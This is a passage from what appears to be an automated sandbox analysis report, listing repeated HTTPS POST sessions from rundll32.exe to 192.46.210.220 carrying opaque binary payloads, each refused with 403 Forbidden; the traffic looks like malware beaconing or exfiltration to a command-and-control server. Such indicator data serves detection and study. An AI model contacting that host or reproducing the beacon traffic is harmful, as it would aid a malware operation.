                                                                                                      2021-10-28 03:07:14 UTC34OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:15 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      70192.168.2.450138192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:19 UTC349OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:19 UTC349OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:20 UTC359INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      71192.168.2.450139192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:19 UTC354OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:19 UTC354OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:20 UTC359INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:20 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      72192.168.2.450146192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:23 UTC359OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:23 UTC359OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:23 UTC369INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      73192.168.2.450147192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:23 UTC364OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:23 UTC364OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:24 UTC369INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:24 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      74192.168.2.450154192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:27 UTC369OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:27 UTC369OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:27 UTC379INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      75192.168.2.450155192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:27 UTC374OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:27 UTC374OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:27 UTC379INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      76192.168.2.450162192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:30 UTC379OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:30 UTC379OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:31 UTC389INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      77192.168.2.450163192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:31 UTC384OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:31 UTC384OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:31 UTC389INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      78192.168.2.450170192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:34 UTC389OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:34 UTC389OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:35 UTC399INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      79192.168.2.450171192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:34 UTC394OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:34 UTC394OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:35 UTC399INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.449817192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:18 UTC39OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:18 UTC40OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:18 UTC49INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      80192.168.2.450178192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:38 UTC399OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:38 UTC399OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:39 UTC409INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      81192.168.2.450179192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:38 UTC404OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
